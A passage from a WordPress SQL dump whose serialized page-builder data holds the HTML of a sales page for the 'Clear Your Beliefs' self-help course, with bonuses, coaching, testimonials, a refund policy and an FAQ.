class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:17:"CYB banner header";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1881, 2164, 'panels_data', 'a:3:{s:7:"widgets";a:5:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:179:"<div class="embed-container"><iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="300" height="150" frameborder="0" allowfullscreen="allowfullscreen"></iframe></div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:661:"<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:70516:"\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and 